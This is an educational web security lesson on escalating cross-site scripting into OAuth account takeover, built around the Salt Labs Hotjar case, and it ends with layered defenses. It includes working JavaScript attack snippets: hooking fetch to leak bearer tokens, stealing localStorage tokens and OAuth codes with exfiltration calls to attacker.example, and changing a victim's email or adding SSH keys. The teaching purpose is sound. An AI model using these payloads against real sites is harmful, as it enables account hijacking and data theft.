XSS Meets OAuth: From Script Injection to Account Takeover
The first three lessons covered XSS types, their payloads, and the vulnerabilities of frontend frameworks. Those focused on running JavaScript in a victim's browser. This lesson explains what happens next: account takeover.
This isn't about password attacks or phishing: XSS can hand the attacker a valid session, letting them act as the victim from the attacker's own browser. And OAuth, the protocol behind "Log in with Google," is what makes that escalation possible.
Here's what we'll cover:
- How OAuth's authorization code flow works (just enough to see where XSS breaks it)
- Why HttpOnly cookies don't solve the problem
- Stealing tokens from localStorage (the simplest attack, and the one we saw in Lesson 1 with DeepSeek)
- The OAuth + XSS attack chain that Salt Labs used to take over accounts on Hotjar and Business Insider
- What the attacker can do in an authenticated session, even without stealing any token at all
- How to defend against XSS-to-account-takeover escalation
OAuth in 60 seconds (for frontend developers)
Most frontend developers have implemented "Log in with Google" or "Log in with GitHub" without looking too closely at what's happening under the hood. Here's the short version.
OAuth's authorization code flow involves four parties: the user, the client (the app), the authorization server (e.g., Google), and the resource server (e.g., user data).
The basic flow is:
- User clicks "Log in with Google".
- Our app redirects the user's browser to Google's authorization endpoint with our app's client ID, a redirect URL, and (in modern implementations) a PKCE code challenge.
- The user sees Google's login or consent screen. If they're already logged into Google, they might just see a brief consent prompt or nothing at all before being redirected back.
- Google redirects the user's browser back to our app's redirect URL with an authorization code in the URL query string:
https://our-app.com/callback?code=abc123&state=xyz
- Our app's backend takes that authorization code (and the PKCE code verifier, if used) and exchanges it for an access token by calling Google's token endpoint directly (server-to-server, not through the browser).
- Our app uses the access token to call Google's API and get the user's profile information. The user is now logged in.
Step 4 is critical: the authorization code appears in the URL query string, where any JavaScript running on our domain can read it with standard DOM APIs.
Normally, the app's JavaScript reads the code from the URL and sends it to the backend for processing.
But with XSS, an attacker's JavaScript can also read this code. PKCE doesn't stop this if the attacker's code runs on the same origin.
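To make this concrete, here is a minimal sketch of what any script on the page, legitimate or injected, can do once the provider redirects back (the callback URL is the illustrative one from the flow above):

```javascript
// Any script running on the page can read the OAuth authorization code
// once the provider redirects back to our origin.
function extractAuthCode(callbackUrl) {
  // In a real page, window.location.href would be passed here.
  return new URL(callbackUrl).searchParams.get("code");
}

// An XSS payload would simply do:
//   const code = extractAuthCode(window.location.href);
// and exfiltrate it before the app's own code consumes it.
const code = extractAuthCode("https://our-app.com/callback?code=abc123&state=xyz");
// code === "abc123"
```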
Why HttpOnly cookies were supposed to save us
Historically, a primary defense against XSS-facilitated session theft has been storing session tokens in cookies with the HttpOnly attribute.
When active, HttpOnly prevents any JavaScript, including XSS payloads, from reading or manipulating the cookie contents through document.cookie, though the browser will continue to send the cookie with each HTTP request.
This worked well in the era of server-rendered applications where the server managed the session, and the cookie was the only credential.
But SPAs changed the architecture.
In modern single-page applications (SPAs) that use OAuth, the access token returned must be accessible to frontend JavaScript for authenticating API requests, typically sent in the Authorization: Bearer <token> HTTP header.
As a result, the token must be stored in a location readable by the application code running in the browser.
Where does it go? Three common options:
localStorage is the most common choice because it's the simplest to implement. Most OAuth tutorials and client libraries default to it.
The token persists across tabs and page refreshes, keeping the user logged in. But any JavaScript on the page can read it, including malicious code such as XSS payloads.
sessionStorage stores tokens at the tab level and does not persist data across tabs. Like localStorage, any JavaScript in the page context can access its data.
With in-memory storage, tokens disappear on page refresh, forcing re-authentication.
Few apps use this due to poor UX. XSS can still steal the token by hooking app requests in JavaScript.
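That hooking looks roughly like this: the payload wraps fetch so every request the app makes leaks its own Authorization header. The sketch assumes plain-object headers for simplicity, and the exfiltration endpoint is hypothetical:

```javascript
// XSS payload sketch: wrap fetch so that every request the app makes
// leaks its Authorization header. This works even when the token only
// ever lives in memory, because the app itself attaches it to requests.
function hookFetch(realFetch, leak) {
  return function (url, options = {}) {
    // Simplification: assumes headers are a plain object, not a Headers instance.
    const auth = options.headers && options.headers["Authorization"];
    if (auth) leak(auth); // exfiltrate the bearer token
    return realFetch(url, options); // forward the request so the app keeps working
  };
}

// In the browser, the payload would install it as (attacker URL hypothetical):
//   window.fetch = hookFetch(window.fetch.bind(window),
//     t => navigator.sendBeacon("https://attacker.example/log", t));
```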
As Philippe De Ryck puts it: with XSS, attackers control your application code and can extract tokens no matter where you store them.
Token location changes the difficulty, not the result.
Stealing tokens from localStorage
The simplest XSS escalation is direct token theft from localStorage:
If the app keeps tokens in localStorage, the attacker can steal them via XSS, set the Authorization header, and log in as the victim.
This is what the DeepSeek attack from Lesson 1 did. Johann Rehberger's XSS payload extracted the userToken from localStorage on chat.deepseek.com and fully compromised the account. One getItem call.
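In sketch form (the key name matches the DeepSeek example; the exfiltration URL is hypothetical):

```javascript
// One-line version the payload would run in the browser:
//   new Image().src = "https://attacker.example/?t=" +
//     encodeURIComponent(localStorage.getItem("userToken"));
// Factored out here so the storage and key are explicit:
function stealToken(storage, key) {
  const token = storage.getItem(key);
  if (!token) return null;
  // The URL the payload would request to exfiltrate the token (hypothetical host):
  return "https://attacker.example/?t=" + encodeURIComponent(token);
}
```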
Don't store tokens in localStorage: use HttpOnly cookies, or keep tokens in memory behind a backend-for-frontend pattern. But token storage is only part of the issue.
The OAuth + XSS attack: stealing authorization codes
Salt Labs demonstrated in July 2024 that XSS and OAuth can be combined to enable account takeover, even with HttpOnly cookies.
They demonstrated it on Hotjar and Business Insider.
The attack doesn't steal cookies. It steals the OAuth authorization code from the URL during a social login flow.
Here's how it works, step by step.
Step 1: Find an XSS vulnerability on the target site.
Salt Labs found a reflected XSS vulnerability in Hotjar's insights.hotjar.com endpoint: the returnURL parameter was reflected into the page without proper encoding, allowing a javascript: URI to execute.
The extraVar parameter was added to bypass Hotjar's WAF.
The URL looks completely legitimate to the victim because the domain is insights.hotjar.com.
Step 2: The XSS payload initiates a new OAuth login flow.
Instead of trying to read cookies (which are HttpOnly) or localStorage (which might be empty), the attacker's JavaScript opens a new window and starts a fresh OAuth login flow with Google.
Because the attacker's script is initiating the flow, it controls all the parameters, including the PKCE code verifier if PKCE is in use.
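A sketch of how the payload might construct that flow. The Google authorize endpoint is real; the client ID, redirect URI, scopes, and the use of the plain PKCE method are illustrative simplifications:

```javascript
// Step 2 sketch: start a fresh OAuth flow whose PKCE verifier the
// ATTACKER generated, so the resulting code is bound to a secret the
// attacker already knows. Client ID and redirect URI are the target
// app's public values (placeholders here).
function buildAuthorizeUrl({ clientId, redirectUri, verifier }) {
  const u = new URL("https://accounts.google.com/o/oauth2/v2/auth");
  u.searchParams.set("client_id", clientId);
  u.searchParams.set("redirect_uri", redirectUri);
  u.searchParams.set("response_type", "code");
  u.searchParams.set("scope", "openid email profile");
  // "plain" keeps this sketch synchronous; a real payload would hash
  // the verifier with crypto.subtle.digest("SHA-256", ...) and use S256.
  u.searchParams.set("code_challenge", verifier);
  u.searchParams.set("code_challenge_method", "plain");
  return u.toString();
}

// In the browser, the payload would then open it in a tiny pop-up:
//   const popup = window.open(buildAuthorizeUrl({...}), "_blank", "width=1,height=1");
```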
Note: the state parameter (used for CSRF protection) isn't included here.
Most OAuth providers don't require it on the authorization request.
The state check happens in the callback, and in this attack, the attacker doesn't need to pass it because they're reading the code directly from the URL rather than submitting the callback form.
Step 3: Google redirects back with the authorization code.
Because the user is already logged into Google (as most people are), Google skips the login screen and immediately redirects back to Hotjar with the authorization code in the URL query string.
Step 4: The XSS JavaScript reads the code from the new window.
The script waits for the OAuth redirect back to insights.hotjar.com to complete; once the pop-up is on the same origin again, the attacker's script can read its URL and extract the code.
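A sketch of that wait-and-read loop. `window.__popup` is a hypothetical name for the pop-up handle the payload opened in step 2; everything else is standard same-origin DOM access:

```javascript
// Step 4 sketch: once the pop-up has been redirected back to our origin,
// the opener can read its URL (same-origin) and pull out the code.
function extractCodeFromPopupUrl(href) {
  return new URL(href).searchParams.get("code");
}

// Browser-side polling loop the payload would run (guarded so this
// sketch stays runnable outside a browser):
if (typeof window !== "undefined" && window.__popup) {
  const timer = setInterval(() => {
    try {
      // Accessing .href throws while the pop-up is still on
      // accounts.google.com (cross-origin); it succeeds after the
      // redirect back to insights.hotjar.com.
      const code = extractCodeFromPopupUrl(window.__popup.location.href);
      if (code) {
        clearInterval(timer);
        window.__popup.close(); // the victim sees the window for well under a second
        // ...send `code` (plus the attacker's verifier) to the attacker's server
      }
    } catch (_) { /* still cross-origin; keep waiting */ }
  }, 50);
}
```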
Step 5: The attacker exchanges the code for a session.
The attacker now has a valid Google authorization code for the victim's Hotjar account. Since the attacker's script initiated the OAuth flow in Step 2, it also knows the PKCE code verifier (if one was used), because the script generated it.
The code is bound to the attacker's verifier, not the legitimate app's. The attacker sends the code and verifier to their server, which exchanges them for an access token and completes the login as the victim.
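The exchange itself is the standard OAuth token request. A sketch of the request body the attacker's server would send (parameter names are the standard ones; no client_secret is included because public SPA clients don't have one):

```javascript
// Step 5 sketch: build the token-exchange request body for the stolen code.
function buildTokenRequestBody({ code, verifier, clientId, redirectUri }) {
  return new URLSearchParams({
    grant_type: "authorization_code",
    code,
    code_verifier: verifier, // the attacker's own verifier from step 2
    client_id: clientId,
    redirect_uri: redirectUri,
  }).toString();
}

// The attacker's server would then POST it:
//   fetch("https://oauth2.googleapis.com/token", {
//     method: "POST",
//     headers: { "Content-Type": "application/x-www-form-urlencoded" },
//     body: buildTokenRequestBody({ ... }),
//   });
```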
Step 6: Full account takeover.
The attacker now has full access to the victim's Hotjar account. Hotjar records user sessions, including keyboard and mouse activity. That data includes names, email addresses, private messages, bank details entered into forms, and, in some cases, credentials. The attacker can change account settings to expose even more data.
From the victim's perspective, they clicked a normal-looking link to insights.hotjar.com, the page loaded, a small pop-up appeared and closed within a second, and everything seemed fine.
Compared with a phishing attack, which requires the victim to type their credentials into a fake page, this is far less visible.
Why this works: what OAuth doesn't protect
The Hotjar attack worked because of a fundamental assumption in OAuth's security model: the browser is a trusted environment. OAuth protects the token exchange with HTTPS and client secrets.
It protects against CSRF with the state parameter. PKCE prevents a network-level attacker from intercepting the authorization code in transit.
But none of that helps when the attacker's code is running inside the same browser, on the same origin, with the same privileges as the legitimate application.
The XSS payload, from the browser's perspective, is part of the application. It can do everything the application can do.
PKCE specifically fails here because it was designed to protect against a different threat: a malicious app on the same device intercepting the redirect.
When the attacker's XSS code initiates the OAuth flow, it generates its own PKCE verifier and receives the code bound to it. PKCE is intact.
It just doesn't matter because the attacker controls both sides.
The state parameter prevents CSRF (an attacker forcing the victim to complete an OAuth flow initiated by the attacker). It doesn't prevent the attacker from reading code from a flow the attacker triggered via XSS.
Beyond token theft: what XSS can do in an authenticated session
Stealing tokens and authorization codes gives the attacker persistent access in their own browser.
But even without exfiltrating any credentials, XSS in an authenticated session can do serious damage in real time.
When the attacker's JavaScript runs in the victim's browser, it runs with the victim's session. Every request it makes includes the victim's cookies automatically.
It can call any API the victim is authorized to use. And if those API endpoints require CSRF tokens, the attacker's script can read the token from the page first (it's typically in a <meta> tag or a hidden form field, both readable by JavaScript) and include it in the request.
Changing the user's email address:
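A hypothetical sketch, with the document and fetch passed in explicitly so the dependencies are visible. The endpoint path, field names, and the CSRF meta tag name are all assumptions, not taken from any real application:

```javascript
// The CSRF token in the page is readable by any same-origin script,
// so the payload reads it first and attaches it like the app would.
function changeVictimEmail(doc, doFetch, newEmail) {
  const csrf = doc.querySelector('meta[name="csrf-token"]').content;
  return doFetch("/api/account/email", {
    method: "POST",
    credentials: "include", // the victim's session cookies go along automatically
    headers: { "Content-Type": "application/json", "X-CSRF-Token": csrf },
    body: JSON.stringify({ email: newEmail }),
  });
}

// In the browser: changeVictimEmail(document, fetch.bind(window), "attacker@evil.example");
```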
Reading sensitive data from the page:
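A hypothetical sketch; the selectors and the exfiltration endpoint are assumptions:

```javascript
// Anything the app renders into the DOM for the victim is readable by
// the payload, CSRF tokens and HttpOnly cookies notwithstanding.
function scrapeSensitiveText(doc) {
  return Array.from(doc.querySelectorAll(".account-details, .message-body"))
    .map(el => el.textContent.trim());
}

// In the browser, the payload would then exfiltrate it, e.g.:
//   navigator.sendBeacon("https://attacker.example/collect",
//     JSON.stringify(scrapeSensitiveText(document)));
```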
Adding an SSH key to a developer account:
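Another hypothetical sketch; the endpoint and payload shape are assumptions. The point is that the request rides on the victim's session cookies:

```javascript
// Persistence sketch: register the attacker's public key on the
// victim's account via an authenticated API call.
function addAttackerSshKey(doFetch, publicKey) {
  return doFetch("/api/user/keys", {
    method: "POST",
    credentials: "include", // victim's session cookies attached automatically
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ title: "backup", key: publicKey }),
  });
}

// In the browser: addAttackerSshKey(fetch.bind(window), "ssh-ed25519 AAAA...");
```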
The email change is particularly dangerous because it gives the attacker a persistent backdoor.
Even after the XSS is patched and the victim's current session expires, the attacker can trigger a password reset to the new email address and regain access.
These attacks work whether tokens are in localStorage, in memory, or in HttpOnly cookies.
They work with or without PKCE. XSS gives the attacker the same capabilities as the victim's browser session, and that's enough.
How to defend against XSS-to-account-takeover
The defenses form layers, and none of them is sufficient on its own.
The real fix is to prevent XSS.
Everything we covered in Lessons 1 through 3 (auto-encoding, sanitization with DOMPurify, the SafeHTML wrapper, URL validation, avoiding escape hatches) exists to prevent the attacker from getting JavaScript execution in the first place.
If they can't run code, the entire attack chain in this lesson is impossible.
For credential storage, every token that doesn't need to be accessed by JavaScript should be in an HttpOnly cookie.
This doesn't prevent the OAuth code theft or the authenticated-session attacks described above, but it blocks the simplest vector: reading tokens from localStorage.
The backend-for-frontend (BFF) pattern goes further. Instead of handling OAuth tokens in the browser, a thin backend server sits between the browser and the OAuth provider.
The browser talks to the BFF with an HttpOnly session cookie, and the BFF handles all OAuth operations server-side: initiating the flow, receiving the callback with the authorization code, exchanging the code for tokens, and attaching the access token to API requests.
The browser never sees the authorization code or the access token. This would have blocked the Salt Labs attack entirely because the authorization code redirect goes to the backend, not to a browser URL that JavaScript can read.
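In the BFF model, all the browser ever receives is an opaque, HttpOnly session cookie; the BFF exchanges the code and keeps the tokens server-side. A sketch of the cookie the BFF's callback handler would set (cookie name and attributes are illustrative):

```javascript
// BFF sketch: after the backend (not the browser) exchanges the
// authorization code for tokens, it responds with an opaque session
// cookie and keeps the access token server-side, keyed by session id.
function buildSessionSetCookie(sessionId) {
  return [
    `session=${sessionId}`,
    "HttpOnly",   // invisible to document.cookie, and therefore to XSS
    "Secure",     // HTTPS only
    "SameSite=Lax",
    "Path=/",
  ].join("; ");
}

// The /callback response would carry:
//   Set-Cookie: session=<opaque id>; HttpOnly; Secure; SameSite=Lax; Path=/
```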
For authenticated-session attacks (email change, SSH key injection, data exfiltration), the most effective defense is to require re-authentication for sensitive operations.
If changing the account email or adding an SSH key requires the user to re-enter their password or complete a WebAuthn challenge, the XSS attacker can't complete those operations even with a valid session. This is specifically what blocks the email-change backdoor technique.
OAuth authorization codes should be single-use and expire quickly (typically within 60 seconds). Access tokens should have short lifetimes.
This limits the window for the attacker to use stolen credentials, though it doesn't help when the attacker's script exfiltrates the code instantly.
A strict Content Security Policy can prevent the attacker's XSS payload from executing in the first place, even if the injection vulnerability exists. We'll cover CSP configuration in detail in Lesson 6.
Finally, monitoring for anomalous OAuth flows (a single user's authorization code exchanged from two different IP addresses, or OAuth flows initiated at unusual frequencies) can catch attacks in progress.
Once XSS achieves code execution, every defense except prevention is damage control. Philippe De Ryck's conclusion from his analysis of token storage applies to this entire lesson: the focus should be on preventing the injection, and the layers exist for when prevention fails.
What's next
In the next lesson, we'll look at a completely different source of XSS: AI.
When LLMs generate code, render HTML, or respond to prompt injection, they can introduce XSS vulnerabilities that no developer wrote.
References
- Salt Labs, "Over 1 Million Websites Are at Risk of Sensitive Information Leakage: XSS is Dead, Long Live XSS" (Hotjar research, July 2024) https://salt.security/blog/over-1-million-websites-are-at-risk-of-sensitive-information-leakage---xss-is-dead-long-live-xss
- Salt Labs, "Lack of Token Verification Flaw in OAuth: Grammarly, Vidio, Bukalapak" (October 2023) https://salt.security/press-releases/salt-security-discovers-lack-of-token-verification-flaw-in-oauth-implementations-likely-impacting-1000s-of-websites-and-exposing-users-to-credential-leakage-and-account-takeover
- Dark Reading, "OAuth+XSS Attack Threatens Millions of Web Users With Account Takeover" (July 2024) https://www.darkreading.com/endpoint-security/oauth-xss-attack-millions-web-users-account-takeover
- SecurityWeek, "Millions of Websites Susceptible to XSS Attack via OAuth Implementation Flaw" (July 2024) https://www.securityweek.com/millions-of-websites-susceptible-xss-attack-via-oauth-implementation-flaw/
- Philippe De Ryck, "Why avoiding LocalStorage for tokens is the wrong solution" https://pragmaticwebsecurity.com/articles/oauthoidc/localstorage-xss.html
- PortSwigger, "OAuth 2.0 authentication vulnerabilities" https://portswigger.net/web-security/oauth
- Doyensec, "Common OAuth Vulnerabilities" (January 2025) https://blog.doyensec.com/2025/01/30/oauth-common-vulnerabilities.html
- Auth0, "Authorization Code Flow" https://auth0.com/docs/get-started/authentication-and-authorization-flow/authorization-code-flow
- OWASP, "OAuth 2.0 Security Best Current Practice" https://cheatsheetseries.owasp.org/cheatsheets/OAuth2_Cheat_Sheet.html